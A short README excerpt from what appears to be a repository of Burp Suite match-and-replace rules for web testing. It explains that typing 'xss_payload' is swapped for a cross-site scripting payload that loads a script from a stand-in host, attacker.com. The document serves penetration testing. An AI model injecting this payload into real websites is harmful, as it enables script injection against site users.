daffainfo/match-replace-burp/README.md

 <img src="https://user-images.githubusercontent.com/36522826/166752610-9d21d86e-49e5-4e8f-86bc-a9134350d46d.png" width="400" />

 > So by just inputting the words `xss_payload` on the website it will be immediately replaced with `"><script src=https://attacker.com></script>`
+> Change the XSS payload as you want

 ## MISC
 Some random match and replace rules